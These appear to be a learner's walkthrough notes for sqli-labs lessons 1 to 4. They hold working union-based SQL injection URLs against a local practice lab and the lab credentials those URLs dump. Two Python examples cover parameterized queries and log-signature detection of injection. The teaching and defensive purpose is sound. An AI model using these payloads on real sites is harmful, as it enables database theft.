"Sqli-labs" Less1~less4

Source: Internet
Author: User

Learning SQL injection: these are some of my notes from working through sqli-labs. There may be mistakes; if anyone spots one, please let me know.

Common knowledge points:

1. There are three kinds of MySQL comment:

① #: comments from # to the end of the line

② -- (with a space): comments from -- to the end of the line; note that -- must be followed by a space

③ /* */: comments out everything between /* and */

2. Query the database names

select schema_name from information_schema.schemata limit 0,1

3. Query the tables of the current database

select table_name from information_schema.tables where table_schema=(select database()) limit 0,1

4. Query all the columns of a given table

select column_name from information_schema.columns where table_name='xxx' limit 0,1

5. Union query

select * from xxx union select 1,2,3

6. group_concat: put multiple rows of results into one line

select group_concat(username) from users limit 0,1

Using group_concat, several results are merged into one line, so all the information can be displayed even when the page has only one output position.

7. concat: merge multiple fields into one field

select concat(username,':',password) from users

Less-1: Error message, single quote

Base URL: http://127.0.0.1/sqli-labs/Less-1/?id=

1. Test whether id is a string type by appending a single quote '

http://127.0.0.1/sqli-labs/Less-1/?id='

Error shown: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' LIMIT 0,1' at line 1

The extra quotes around our input show that id is a string type.

2. Test how many columns the query has with union: three columns work, and columns 2 and 3 are displayed on the page.

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,3 -- a
http://127.0.0.1/sqli-labs/Less-1/?id=%27%20union%20select%201,2,3%20--%20a

3. Query the data in the database

① Query all the tables in the database

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=(select database()) limit 0,1 -- a

Result: Your Login name:emails,referers,uagents,users

This shows there are four tables.

② Query all the columns of the users table

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' limit 0,1 -- a

Result: Your Login name:id,username,password

③ Query all usernames and passwords

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,group_concat(username),group_concat(password) from users limit 0,1 -- a

Result:

Your Login name:dumb,angelina,dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

Question:

Why does the comment work with -- a but not with #?
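To make the Less-1 behaviour, and the question about #, concrete from the defender's side, here is an added example; it is not part of these notes or of sqli-labs. It rebuilds the lab's query shape in Python against an in-memory SQLite table with constructed sample rows (the users table and its id/username/password columns follow the notes; the rows, the function names make_db, lookup_vulnerable, lookup_parameterized and id_as_server_sees_it are all assumptions). It runs the union payload through a string-built query and through a parameterized one, and uses urllib.parse to show what the server actually receives when # or %23 is typed into the address bar. SQLite accepts -- comments and group_concat like MySQL, but has no # comments and no information_schema, so the schema-enumeration queries are not reproduced here.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the lab's users table (sample rows, not the real sqli-labs data).
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
]


def make_db():
    """In-memory SQLite database with a three-column users table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Less-1 shape: the id value is pasted into the SQL text inside single quotes.

    Whatever the caller puts in user_id becomes part of the statement, so a value that
    starts with a quote closes the string literal and the rest is parsed as SQL; the
    trailing '-- a' turns the original LIMIT 0,1 into a comment.
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the id travels as a bound parameter, never as SQL text."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def id_as_server_sees_it(url):
    """Return the id parameter exactly as the web server would receive it.

    A literal '#' in the address bar starts the URL fragment, which the browser keeps
    to itself, so nothing from '#' onward is sent; '%23' is sent and decodes to '#'.
    """
    parts = urlsplit(url)
    return parse_qs(parts.query, keep_blank_values=True).get("id", [""])[0]


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "3"))
    union_payload = "' UNION SELECT 1, group_concat(username), group_concat(password) FROM users -- a"
    print(lookup_vulnerable(db, union_payload))     # one row carrying every username and password
    print(lookup_parameterized(db, union_payload))  # [] : the payload is just a string that matches no id
    print(repr(id_as_server_sees_it("http://127.0.0.1/sqli-labs/Less-1/?id=1'#")))    # "1'"  : the # never arrives
    print(repr(id_as_server_sees_it("http://127.0.0.1/sqli-labs/Less-1/?id=1'%23")))  # "1'#"
```

Run stand-alone, the string-built lookup returns the group_concat row for the payload while the parameterized lookup returns nothing for the very same input, which is the whole mitigation: the bound value can never change the statement's structure. The last two lines show the answer to the question above as data: a bare # in the URL bar is the fragment delimiter and is dropped before the request leaves the browser, so the server's SQL still ends with the original LIMIT clause, whereas -- a (sent as --%20a) or an encoded %23 does reach the server.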

Less-2: Error, Integer

① Test the id type

http://127.0.0.1/sqli-labs/Less-2/?id='

Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

The error shows only ' LIMIT 0,1, so id is numeric and is not wrapped in any quotes.

② Query all usernames and passwords, adding order by so that all the content is displayed. The intermediate steps are the same as in Less-1 and are skipped.

http://127.0.0.1/sqli-labs/Less-2/?id=3 union select 1,group_concat(username),group_concat(password) from users order by id limit 0,1 -- a

Less-3: Error, interfering string

① Test the id type

http://127.0.0.1/sqli-labs/Less-3/?id='

Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''') LIMIT 0,1' at line 1

The difference from Less-1 is that the id is followed by a closing parenthesis, so it can be inferred that the id is written as id=('3'). When constructing the SQL, the parenthesis has to be closed as well as the quote.

② Query all usernames and passwords

http://127.0.0.1/sqli-labs/Less-3/?id=3') union select 1,group_concat(username),group_concat(password) from users order by id limit 0,1 -- a

Less-4: Error, double quote

① Test the id type

http://127.0.0.1/sqli-labs/Less-4/?id='

Result: normal output, so keep testing. Being lazy here and going by the lesson name, test the double quote directly:

http://127.0.0.1/sqli-labs/Less-4/?id="

Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"") LIMIT 0,1' at line 1

This shows that id is a string and is written as id=("3").

② Get all usernames and passwords, closing the double quote and the parenthesis

http://127.0.0.1/sqli-labs/Less-4/?id=3") union select 1,group_concat(username),group_concat(password) from users order by id limit 0,1 -- a
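The four lessons differ only in how the id is wrapped (', a bare number, (') or (")), so from the monitoring side the same few tokens show up in the access log whichever context is being closed: a union select, information_schema, group_concat, a trailing comment and a stray quote. The following added example, written for these notes and not taken from sqli-labs, runs a small signature check over constructed Apache-style log lines carrying the request shapes used above; the log lines, the signature names and the functions decoded_query, indicators and scan are all assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (Apache combined format) for the request shapes in the
# walkthrough; none of these come from a real server.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2023:13:55:36 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 742 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Oct/2023:13:55:40 +0000] "GET /sqli-labs/Less-1/?id=%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=(select%20database())%20--%20a HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Oct/2023:13:55:44 +0000] "GET /sqli-labs/Less-4/?id=3%22)%20union%20select%201,group_concat(username),group_concat(password)%20from%20users%20--%20a HTTP/1.1" 200 905 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Oct/2023:13:55:48 +0000] "GET /sqli-labs/Less-2/?id=%27 HTTP/1.1" 200 610 "-" "Mozilla/5.0"',
]

# Request line inside the quoted part of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Each signature is applied to the URL-decoded query string, so %20 / %27 / %22 encodings
# do not hide the tokens.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("row-concatenation", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("sql-comment", re.compile(r"--\s|#|/\*")),
]


def decoded_query(line):
    """Pull the request target out of a log line and return its decoded query string.

    Returns None when the line does not carry a recognisable request.
    """
    m = REQUEST_RE.search(line)
    if not m:
        return None
    return unquote_plus(urlsplit(m.group("target")).query)


def indicators(line):
    """Names of the injection indicators present in one log line (empty list if none)."""
    query = decoded_query(line)
    if query is None:
        return []
    found = [name for name, rx in SIGNATURES if rx.search(query)]
    # An odd number of quotes is what the Less-1..4 probes look like (id=' or id=") and how
    # every union payload above starts. On its own it is noisy (a search for O'Brien trips
    # it too), so it is recorded as supporting evidence rather than as a verdict.
    if query.count("'") % 2 == 1 or query.count('"') % 2 == 1:
        found.append("unbalanced-quote")
    return found


def scan(lines):
    """Return (line_number, indicators) for every line that triggered at least one indicator."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = indicators(line)
        if found:
            hits.append((number, found))
    return hits


if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

The first line (a plain id=1) produces nothing; the Less-1 enumeration line trips every signature, the Less-4 line trips all but schema-enumeration, and the bare id=' probe is caught only by the quote count. In a real deployment the decoded query, not the raw request line, is what the rules should see, and the same check belongs on POST bodies and cookies as well as the query string, since the lab's later lessons move the injection point there.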

